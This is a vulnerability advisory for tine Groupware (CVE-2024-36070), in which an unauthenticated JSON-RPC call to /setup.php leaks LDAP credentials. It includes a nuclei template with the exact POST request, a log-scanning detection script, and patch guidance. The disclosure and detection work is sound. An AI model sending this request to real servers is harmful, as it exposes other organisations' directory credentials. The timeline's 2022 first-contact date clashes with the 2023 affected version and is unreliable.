usd-2024-0002 | Password Leakage in tine 2023.11.2
Product: tine Groupware
Affected Version: prior to 2023.11.8
Vulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)
Security Risk: High
Vendor: Tine Groupware
Vendor URL: https://www.tine-groupware.de/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2024-36070
CVE Link: https://nvd.nist.gov/vuln/detail/cve-2024-36070
Description
Tine Groupware is an open-source web application designed to enhance collaboration and productivity in a team or organization. It offers a wide range of features such as email, calendar, address book, task management, and file sharing.
If the application is configured to use an LDAP backend, the LDAP credentials are exposed to unauthorized users.
Proof of Concept
The /setup.php endpoint leaks the LDAP password through the Setup.getAllRegistryData JSON-RPC method, which can be called without authentication.
The following nuclei template was created to check for unauthorized access to the method:
id: tine20-unauth-ldap-password-leak

info:
  name: Unauthenticated LDAP password leak
  author: ChristianPoeschl
  severity: high
  description: tine leaks LDAP password to unauthenticated users

http:
  - raw:
      - |
        POST /setup.php HTTP/1.1
        Host: {{Hostname}}
        X-Tine20-Request-Type: JSON

        {"jsonrpc":"2.0","method":"Setup.getAllRegistryData","params":{},"id":2}

    matchers:
      - type: word
        condition: and
        words:
          - authenticationData
          - configExists
          - '"backend":"Ldap"'
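The request body and the X-Tine20-Request-Type header are not visible in ordinary web server access logs, but the POST to /setup.php is. The following script is an added example (not part of the advisory or of Tine Groupware) that scans Apache/nginx "combined" format access log lines and flags POST requests to /setup.php from addresses outside an administrative allowlist, so that exposure prior to patching can be assessed. The allowlist network, the log lines and the regular expression for the combined format are assumptions constructed for the example.

```python
"""Flag POST requests to /setup.php from non-administrative sources in combined-format access logs."""
import ipaddress
import re

# Assumption: standard Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed example allowlist: networks from which setup access is expected.
ADMIN_NETS = [ipaddress.ip_network("10.0.0.0/8")]

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [11/Apr/2024:10:00:01 +0000] "POST /setup.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Apr/2024:10:02:13 +0000] "POST /setup.php HTTP/1.1" 200 4876 "-" "curl/8.0"
203.0.113.7 - - [11/Apr/2024:10:02:14 +0000] "GET /index.php HTTP/1.1" 200 1200 "-" "curl/8.0"
198.51.100.9 - - [11/Apr/2024:10:05:00 +0000] "POST /setup.php?x=1 HTTP/1.1" 403 0 "-" "python-requests/2.31"
"""


def parse_line(line):
    """Return a dict of the relevant fields, or None if the line does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["status"] = int(d["status"])
    d["size"] = 0 if d["size"] == "-" else int(d["size"])
    return d


def is_admin(ip, admin_nets=ADMIN_NETS):
    """True if the client address lies in one of the allowlisted networks."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in admin_nets)


def flag_setup_access(lines, admin_nets=ADMIN_NETS):
    """Return entries for POST /setup.php requests from non-allowlisted addresses.

    Each entry carries the HTTP status so that successful (2xx) responses, which
    may have returned the registry data, can be prioritised over denied ones.
    """
    flagged = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        path = entry["path"].split("?", 1)[0]
        if entry["method"] != "POST" or path != "/setup.php":
            continue
        if is_admin(entry["ip"], admin_nets):
            continue
        flagged.append(entry)
    return flagged


def successful_exposures(lines, admin_nets=ADMIN_NETS):
    """Subset of flagged entries where the server answered with a 2xx status."""
    return [e for e in flag_setup_access(lines, admin_nets) if 200 <= e["status"] < 300]


if __name__ == "__main__":
    for e in flag_setup_access(SAMPLE_LOG.splitlines()):
        print(f'{e["ts"]} {e["ip"]} POST /setup.php -> {e["status"]} ({e["size"]} bytes)')
```

Run over the real access log instead of SAMPLE_LOG; a 2xx hit from an unexpected source on a version prior to 2023.11.8 should be treated as a possible disclosure of the LDAP bind credentials, and those credentials rotated.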
Fix
Ensure proper access control on the setup endpoint.
Users of Tine Groupware should update to a current, patched version (2023.11.8 or later).
References
- https://www.tine-groupware.de/
- https://github.com/tine-groupware/tine/releases/tag/2023.11.8
- https://github.com/tine-groupware/tine/commit/5d556a1225aa358cbf7cfbeae518c9386b46f516
Timeline
- 2022-04-04: First contact request via info@metaways.de
- 2024-04-09: Vulnerability is fixed by the vendor; a patched release is planned.
- 2024-04-11: A patched release is made available on GitHub.
Credits
This security vulnerability was identified by Christian Pöschl of usd AG.